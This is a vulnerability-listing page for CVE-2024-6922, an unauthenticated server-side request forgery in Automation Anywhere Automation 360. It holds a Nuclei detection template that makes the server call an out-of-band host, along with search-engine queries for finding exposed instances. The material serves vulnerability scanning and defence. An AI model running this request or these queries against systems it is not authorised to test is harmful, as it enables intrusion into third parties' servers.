CVE-2024-6922: Automation Anywhere Automation 360 - Server-Side Request Forgery

2025-08-01 Automation Anywhere Automation 360 PoC Public

Description

Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.

PoC

id: CVE-2024-6922

info:
  name: Automation Anywhere Automation 360 - Server-Side Request Forgery
  author: DhiyaneshDK
  severity: high
  description: |
    Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server.
  reference:
    - https://www.automationanywhere.com/products/automation-360
    - https://www.rapid7.com/blog/post/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6922
  classification:
    epss-score: 0.30172
    epss-percentile: 0.98125
    cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1005691603
    fofa-query: icon_hash="-1005691603"
    product: automation_360
    vendor: automationanywhere
  tags: cve,cve2024,ssrf,oast,automation,anywhere,vuln


http:
  - raw:
      - |
        POST /v1/proxy/test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"saasUrl":"{{interactsh-url}}/?param=one#"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '{"message":'

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 400
# digest: 490a004630440220168f61c97e4f979e1afcfb2ca94941136e7e8499fa0b38bf1c8fd9054bd6be40022058947a39707f9cba9a08e600df8aa2b1a6c1f1f6df66342438cb139cecd4a07a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities